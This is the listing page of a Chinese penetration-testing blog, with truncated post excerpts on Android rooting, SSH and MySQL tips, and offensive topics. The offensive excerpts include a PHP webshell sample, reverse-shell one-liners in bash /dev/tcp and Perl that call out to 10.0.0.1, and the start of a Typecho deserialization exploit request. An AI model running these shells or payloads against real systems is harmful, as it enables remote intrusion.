MoR03r MoR03r's Blog
Nexus 5 刷Nethunter
发表于 2023-2-14 | 综合
0x01 解锁Bootloader 谷歌的手机解锁以及root很简单,按照以下步骤即可 使用数据线连接电脑,开启开发者模式的情况下直接使用命令adb reboot bootloader即可进入fastboot模式 在fastboot模式下,使用命令fastboot oem unlock或fastboot flashing unlock即可完成解锁 0x02 刷入第三方recovery 在网站https://twrp.me/Devices/选择合适的twrp镜像,例如nexus 5的twrp下载地址为https://...

阅读全文>>

冰蝎打包app
发表于 2020-1-6 | 综合
前言 应土司@nszy007老哥要求,咱也扯这么一篇,第一次做的这个,望大佬们高抬贵手 正文 程序篇 不多废话,还是以冰蝎为例 首先准备好冰蝎 主要使用Behinder.jar和data.db这两个文件 打开系统自带的automator(老哥们肯定知道怎么找的,我作为mac小白就不献丑了) 在菜单栏选择文件->新建 然后在弹出的对话框里选择Application 接下来搜索Run Shell Script,选中后双...

阅读全文>>

SSH用户配置文件Config的小Tips
发表于 2019-9-2 | 综合
常用的ssh连接命令一般形如: $ ssh user@hostname -p port 使用公私钥登陆: $ ssh user@hostname -p port -i id_rsa 如果需要管理的服务器过多,每次这样进行连接比较麻烦,而且浪费时间和精力。接下来进入正题,使用ssh的用户配置文件Config文件来管理不同的ssh会话。 使用SSH配置文件 SSH程序可以从两个路径获取配置参数: 用户配置文件(~/.ssh/config) 系统配置文件(/etc/ssh/ssh_config) ...

阅读全文>>

查看mysql数据库及表编码格式
发表于 2019-3-11 | 综合
查看mysql数据库及表编码格式 1.查看数据库编码格式 mysql> show variables like 'character_set_database' 2.查看数据表的编码格式 mysql> show create table <表名>; 3.创建数据库时指定数据库的字符集 mysql>create database <数据库名> character set utf8; 4.创建数据表时指定数据表的编码格式 create table tb_books ( name ...

阅读全文>>

发现一个小马的利用方式
发表于 2018-10-25 | 综合
先贴代码吧 <?php $k = @$_SERVER["HTTP_DNT"]; $d = $p = ''; foreach ($_POST as $a => $b) $d.= $b; $t = eccode($d, 'DECODE', $k); $t = gzuncompress($t); $p = unserialize($t); $_POST = $p; $_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1...

阅读全文>>

cmd下查询3389远程桌面端口
发表于 2018-9-28 | 综合
cmd下查询3389远程桌面端口 因为要经常用到,在博客中做个笔记 在命令行下执行 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 返回: 其中的0xd3d即为端口,转为十进制: Windows下可以用计算器:

阅读全文>>

反弹一个TTY Shell
发表于 2018-9-7 | 综合
通常在webshell中反弹一个shell到主机或VPS中,产生的shell并不是tty(交互式)shell 此时我们无法通过输入su命令来切换用户,故有此文 Python python -c 'import pty; pty.spawn("/bin/sh")' 下面的方式未验证成功,Python中没有echo,如果去掉echo保存到py文件中可以成功 echo os.system('/bin/bash') Bash /bin/sh -i Perl 直接执行 perl -e 'exec "/b...

阅读全文>>

新秀(sinsiu)cms代码审计小计
发表于 2018-7-20 | 综合
sinsiu PHP 1.0 final 不多说,先上了Seay源代码审计系统,查看了一些东西 然后跟了一下,在admin/module/file/deal.php 第69~71行这里发现没有对数据以及文件名进行任何过滤 跟进post函数,位置为include/function.php 第198~201行,从上一步获取两个参数,第二个参数没有使用默认的strict,而是no_filter function post($val,$filter = 'strict') { return $filter(isset($_POS...

阅读全文>>

Linux下反弹shell方法总结
发表于 2017-11-16 | 综合
Bash版: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Perl版: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("...

阅读全文>>

Typecho install.php 反序列化导致任意代码执行
发表于 2017-10-25 | 综合
0x00 前言 听说了这个洞,吓得赶紧去看了一下自己的博客,发现自己当初安装完就把这个文件和install目录删了,看来当初自己安全意识还是可以滴 233 0x01 Payload GET /typecho/install.php?finish=1 HTTP/1.1 Host: 192.168.211.169 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/x...

阅读全文>>

TOP